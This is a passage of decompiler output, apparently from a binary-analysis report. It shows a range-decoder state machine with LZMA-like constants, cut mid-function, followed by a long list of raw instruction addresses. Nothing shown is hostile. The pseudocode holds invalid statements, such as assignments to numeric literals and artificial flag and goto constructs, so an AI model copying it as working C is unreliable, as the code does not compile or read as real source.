												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                                                                            0x00000000
                                                                                            0x00407395
                                                                                            0x00407395
                                                                                            0x00407399
                                                                                            0x004073be
                                                                                            0x004073c8
                                                                                            0x00000000
                                                                                            0x0040739b
                                                                                            0x0040739b
                                                                                            0x0040739e
                                                                                            0x004073a2
                                                                                            0x004073a5
                                                                                            0x004073a8
                                                                                            0x004073ac
                                                                                            0x004073ac
                                                                                            0x004073af
                                                                                            0x00407489
                                                                                            0x00407489
                                                                                            0x00407490
                                                                                            0x00407490
                                                                                            0x00407493
                                                                                            0x0040749a
                                                                                            0x004074c7
                                                                                            0x004074cb
                                                                                            0x0040752b
                                                                                            0x0040752e
                                                                                            0x00407533
                                                                                            0x00407534
                                                                                            0x00407536
                                                                                            0x00407538
                                                                                            0x0040753b
                                                                                            0x00407447
                                                                                            0x00407447
                                                                                            0x00407447
                                                                                            0x00406be3
                                                                                            0x00406be3
                                                                                            0x00406be3
                                                                                            0x00406bec
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406bf2
                                                                                            0x00000000
                                                                                            0x00406bfd
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406c06
                                                                                            0x00406c09
                                                                                            0x00406c0c
                                                                                            0x00406c10
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406c16
                                                                                            0x00406c19
                                                                                            0x00406c1b
                                                                                            0x00406c1c
                                                                                            0x00406c1f
                                                                                            0x00406c21
                                                                                            0x00406c22
                                                                                            0x00406c24
                                                                                            0x00406c27
                                                                                            0x00406c2c
                                                                                            0x00406c31
                                                                                            0x00406c3a
                                                                                            0x00406c4d
                                                                                            0x00406c50
                                                                                            0x00406c5c
                                                                                            0x00406c84
                                                                                            0x00406c86
                                                                                            0x00406c94
                                                                                            0x00406c94
                                                                                            0x00406c98
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406c88
                                                                                            0x00406c88
                                                                                            0x00406c8b
                                                                                            0x00406c8c
                                                                                            0x00406c8c
                                                                                            0x00000000
                                                                                            0x00406c88
                                                                                            0x00406c62
                                                                                            0x00406c67
                                                                                            0x00406c67
                                                                                            0x00406c70
                                                                                            0x00406c78
                                                                                            0x00406c7b
                                                                                            0x00000000
                                                                                            0x00406c81
                                                                                            0x00406c81
                                                                                            0x00000000
                                                                                            0x00406c81
                                                                                            0x00000000
                                                                                            0x00406c9e
                                                                                            0x00406c9e
                                                                                            0x00406ca2
                                                                                            0x0040754e
                                                                                            0x00000000
                                                                                            0x0040754e
                                                                                            0x00406cab
                                                                                            0x00406cbb
                                                                                            0x00406cbe
                                                                                            0x00406cc1
                                                                                            0x00406cc1
                                                                                            0x00406cc1
                                                                                            0x00406cc4
                                                                                            0x00406cc8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406cca
                                                                                            0x00406cd0
                                                                                            0x00406cfa
                                                                                            0x00406d00
                                                                                            0x00406d07
                                                                                            0x00000000
                                                                                            0x00406d07
                                                                                            0x00406cd6
                                                                                            0x00406cd9
                                                                                            0x00406cde
                                                                                            0x00406cde
                                                                                            0x00406ce9
                                                                                            0x00406cf1
                                                                                            0x00406cf4
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406d39
                                                                                            0x00406d3f
                                                                                            0x00406d42
                                                                                            0x00406d4f
                                                                                            0x00406d57
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406d0e
                                                                                            0x00406d0e
                                                                                            0x00406d12
                                                                                            0x0040755d
                                                                                            0x00000000
                                                                                            0x0040755d
                                                                                            0x00406d1e
                                                                                            0x00406d29
                                                                                            0x00406d29
                                                                                            0x00406d29
                                                                                            0x00406d2c
                                                                                            0x00406d2f
                                                                                            0x00406d32
                                                                                            0x00406d37
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004073ce
                                                                                            0x004073ce
                                                                                            0x004073d4
                                                                                            0x004073da
                                                                                            0x004073e0
                                                                                            0x004073fa
                                                                                            0x004073fd
                                                                                            0x00407403
                                                                                            0x0040740e
                                                                                            0x0040740e
                                                                                            0x00407410
                                                                                            0x004073e2
                                                                                            0x004073e2
                                                                                            0x004073f1
                                                                                            0x004073f5
                                                                                            0x004073f5
                                                                                            0x0040741a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040741c
                                                                                            0x00407420
                                                                                            0x004075cf
                                                                                            0x00000000
                                                                                            0x004075cf
                                                                                            0x0040742c
                                                                                            0x00407433
                                                                                            0x0040743b
                                                                                            0x0040743e
                                                                                            0x00407441
                                                                                            0x00407441
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406d5f
                                                                                            0x00406d61
                                                                                            0x00406d64
                                                                                            0x00406dd5
                                                                                            0x00406dd8
                                                                                            0x00406ddb
                                                                                            0x00406de2
                                                                                            0x00406dec
                                                                                            0x00000000
                                                                                            0x00406dec
                                                                                            0x00406d66
                                                                                            0x00406d6a
                                                                                            0x00406d6d
                                                                                            0x00406d6f
                                                                                            0x00406d72
                                                                                            0x00406d75
                                                                                            0x00406d77
                                                                                            0x00406d7a
                                                                                            0x00406d7c
                                                                                            0x00406d81
                                                                                            0x00406d84
                                                                                            0x00406d87
                                                                                            0x00406d8b
                                                                                            0x00406d92
                                                                                            0x00406d95
                                                                                            0x00406d9c
                                                                                            0x00406da0
                                                                                            0x00406da8
                                                                                            0x00406da8
                                                                                            0x00406da8
                                                                                            0x00406da2
                                                                                            0x00406da2
                                                                                            0x00406da2
                                                                                            0x00406d97
                                                                                            0x00406d97
                                                                                            0x00406d97
                                                                                            0x00406dac
                                                                                            0x00406daf
                                                                                            0x00406dcd
                                                                                            0x00406dcf
                                                                                            0x00000000
                                                                                            0x00406db1
                                                                                            0x00406db1
                                                                                            0x00406db4
                                                                                            0x00406db7
                                                                                            0x00406dba
                                                                                            0x00406dbc
                                                                                            0x00406dbc
                                                                                            0x00406dbc
                                                                                            0x00406dbf
                                                                                            0x00406dc2
                                                                                            0x00406dc4
                                                                                            0x00406dc5
                                                                                            0x00406dc8
                                                                                            0x00000000
                                                                                            0x00406dc8
                                                                                            0x00000000
                                                                                            0x00406ffe
                                                                                            0x00407002
                                                                                            0x00407020
                                                                                            0x00407023
                                                                                            0x0040702a
                                                                                            0x0040702d
                                                                                            0x00407030
                                                                                            0x00407033
                                                                                            0x00407036
                                                                                            0x00407039
                                                                                            0x0040703b
                                                                                            0x00407042
                                                                                            0x00407043
                                                                                            0x00407045
                                                                                            0x00407048
                                                                                            0x0040704b
                                                                                            0x0040704e
                                                                                            0x0040704e
                                                                                            0x00407053
                                                                                            0x00000000
                                                                                            0x00407053
                                                                                            0x00407004
                                                                                            0x00407007
                                                                                            0x0040700a
                                                                                            0x00407014
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407068
                                                                                            0x0040706c
                                                                                            0x0040708f
                                                                                            0x00407092
                                                                                            0x00407095
                                                                                            0x0040709f
                                                                                            0x0040706e
                                                                                            0x0040706e
                                                                                            0x00407071
                                                                                            0x00407074
                                                                                            0x00407077
                                                                                            0x00407084
                                                                                            0x00407087
                                                                                            0x00407087
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004070ab
                                                                                            0x004070af
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004070b5
                                                                                            0x004070b9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004070bf
                                                                                            0x004070c1
                                                                                            0x004070c5
                                                                                            0x004070c5
                                                                                            0x004070c8
                                                                                            0x004070cc
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040711c
                                                                                            0x00407120
                                                                                            0x00407127
                                                                                            0x0040712a
                                                                                            0x0040712d
                                                                                            0x00407137
                                                                                            0x00000000
                                                                                            0x00407137
                                                                                            0x00407122
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407143
                                                                                            0x00407147
                                                                                            0x0040714e
                                                                                            0x00407151
                                                                                            0x00407154
                                                                                            0x00407149
                                                                                            0x00407149
                                                                                            0x00407149
                                                                                            0x00407157
                                                                                            0x0040715a
                                                                                            0x0040715d
                                                                                            0x0040715d
                                                                                            0x00407160
                                                                                            0x00407163
                                                                                            0x00407166
                                                                                            0x00407166
                                                                                            0x00407169
                                                                                            0x00407170
                                                                                            0x00407175
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407203
                                                                                            0x00407203
                                                                                            0x00407207
                                                                                            0x004075a5
                                                                                            0x00000000
                                                                                            0x004075a5
                                                                                            0x0040720d
                                                                                            0x00407210
                                                                                            0x00407213
                                                                                            0x00407217
                                                                                            0x0040721a
                                                                                            0x00407220
                                                                                            0x00407222
                                                                                            0x00407222
                                                                                            0x00407222
                                                                                            0x00407225
                                                                                            0x00407228
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406df8
                                                                                            0x00406df8
                                                                                            0x00406dfc
                                                                                            0x00407569
                                                                                            0x00000000
                                                                                            0x00407569
                                                                                            0x00406e02
                                                                                            0x00406e05
                                                                                            0x00406e08
                                                                                            0x00406e0c
                                                                                            0x00406e0f
                                                                                            0x00406e15
                                                                                            0x00406e17
                                                                                            0x00406e17
                                                                                            0x00406e17
                                                                                            0x00406e1a
                                                                                            0x00406e1d
                                                                                            0x00406e1d
                                                                                            0x00406e20
                                                                                            0x00406e23
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406e29
                                                                                            0x00406e2f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406e35
                                                                                            0x00406e35
                                                                                            0x00406e39
                                                                                            0x00406e3c
                                                                                            0x00406e3f
                                                                                            0x00406e42
                                                                                            0x00406e45
                                                                                            0x00406e46
                                                                                            0x00406e49
                                                                                            0x00406e4b
                                                                                            0x00406e51
                                                                                            0x00406e54
                                                                                            0x00406e57
                                                                                            0x00406e5a
                                                                                            0x00406e5d
                                                                                            0x00406e60
                                                                                            0x00406e63
                                                                                            0x00406e7f
                                                                                            0x00406e82
                                                                                            0x00406e85
                                                                                            0x00406e88
                                                                                            0x00406e8f
                                                                                            0x00406e93
                                                                                            0x00406e95
                                                                                            0x00406e99
                                                                                            0x00406e65
                                                                                            0x00406e65
                                                                                            0x00406e69
                                                                                            0x00406e71
                                                                                            0x00406e76
                                                                                            0x00406e78
                                                                                            0x00406e7a
                                                                                            0x00406e7a
                                                                                            0x00406e9c
                                                                                            0x00406ea3
                                                                                            0x00406ea6
                                                                                            0x00000000
                                                                                            0x00406eac
                                                                                            0x00000000
                                                                                            0x00406eac
                                                                                            0x00000000
                                                                                            0x00406eb1
                                                                                            0x00406eb1
                                                                                            0x00406eb5
                                                                                            0x00407575
                                                                                            0x00000000
                                                                                            0x00407575
                                                                                            0x00406ebb
                                                                                            0x00406ebe
                                                                                            0x00406ec1
                                                                                            0x00406ec5
                                                                                            0x00406ec8
                                                                                            0x00406ece
                                                                                            0x00406ed0
                                                                                            0x00406ed0
                                                                                            0x00406ed0
                                                                                            0x00406ed3
                                                                                            0x00406ed6
                                                                                            0x00406ed6
                                                                                            0x00406ed6
                                                                                            0x00406edc
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406ede
                                                                                            0x00406ee1
                                                                                            0x00406ee4
                                                                                            0x00406ee7
                                                                                            0x00406eea
                                                                                            0x00406eed
                                                                                            0x00406ef0
                                                                                            0x00406ef3
                                                                                            0x00406ef6
                                                                                            0x00406ef9
                                                                                            0x00406efc
                                                                                            0x00406f14
                                                                                            0x00406f17
                                                                                            0x00406f1a
                                                                                            0x00406f1d
                                                                                            0x00406f1d
                                                                                            0x00406f20
                                                                                            0x00406f24
                                                                                            0x00406f26
                                                                                            0x00406efe
                                                                                            0x00406efe
                                                                                            0x00406f06
                                                                                            0x00406f0b
                                                                                            0x00406f0d
                                                                                            0x00406f0f
